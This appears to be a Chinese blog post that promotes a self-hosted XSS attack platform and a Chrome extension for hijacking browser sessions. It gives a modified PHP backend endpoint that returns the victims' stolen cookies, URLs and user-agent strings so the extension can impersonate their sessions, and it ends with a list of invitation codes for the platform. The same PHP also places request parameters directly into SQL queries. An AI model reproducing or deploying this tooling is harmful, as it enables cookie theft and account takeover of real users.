原先一直用xss.hk结果不知怎么被关的,正好手上有代码于是自己搭了一个,网上的类似的xss平台大多一样,原先的xss的chrome插件,不适合 "manifest_version": 2,
而且很多其他的xss平台直接把代码拿过来,chrome插件的里面的许多代码内容跟xss.me这个与域名绑定的,而且有些加密cookie里面有浏览器的ua信息绑定,所以只用插件替换cookie有时候无法达到效果,否则得借助第三方修改header的插件,我们希望的是完全模拟劫持到的浏览器会话。
于是有了这一次的修改,php那把在/do/auth的那个接口返回增加了劫持ua的信息,点击口修改当前浏览器cookie跟ua来劫持会话。
数据放在别人那总归不放心,当然你也可以只用插件,填你自己的接口的信息,你只用插件来劫持会话,我也不会知道你的数据,不过你得稍微修改下php后台的的接口。
平台地址:
因被公司和谐,域名转到原先的账号依然存在 code4liet.duapp.com
chrome xss mitm attack插件代码地址
https://github.com/lietdai/xss-mitm-attack
修改后的do.php
<?php
/**
* api.php 接口
* ----------------------------------------------------------------
* OldCMS,site:http://www.oldcms.com
*/
if(!defined('IN_OLDCMS')) die('Access Denied'); $auth=Val('auth','GET');
$db=DBConnect();
$project=$db->FirstRow("SELECT * FROM ".Tb('project')." WHERE authCode='{$auth}'");
if(empty($project)) exit('Auth Err.'); switch($act){
case 'content':
default:
$domain=Val('domain','GET');
$where='';
if(!empty($domain)) $where.=" AND domain='{$domain}'";
$res=$db->Dataset("SELECT content,serverContent FROM ".Tb('project_content')." WHERE projectId='{$project[id]}' {$where} ORDER BY id DESC");
$data=array();
foreach($res as $k=>$v){
$row=array();
$content=json_decode($v['content'],true);
$serverContent = json_decode($v['serverContent'],true);
$row['url']=$content['opener']?$content['opener']: $content['toplocation'];
$row['cookie']=$content['cookie'];
$serverContent = json_decode($v['serverContent'],true);
$row['ua'] = $serverContent['HTTP_USER_AGENT']?:"";
$data[]=$row;
}
echo JsonEncode($data);
break;
}
?>
发几个邀请码
71ac500c5a331cb7b2806a8e817f1672
34f3f778fa77c0f7fe8efb162ae70db0
df8825cf489fbca96a4663262afd02e1
65d17af1988fdde9f81696105c0ce3eb
4bdf5873cc19e995a925cbf203fdeeba
a66411d043503ea0bfe106a98a093c59
0695d3e66ab68d2b6d88949cbaf575c3
fb92a90b9a8264862699ed04a7d432a4
d358e24bc7ce3e81c73d54dbbb8b1195
禁止x政教=。=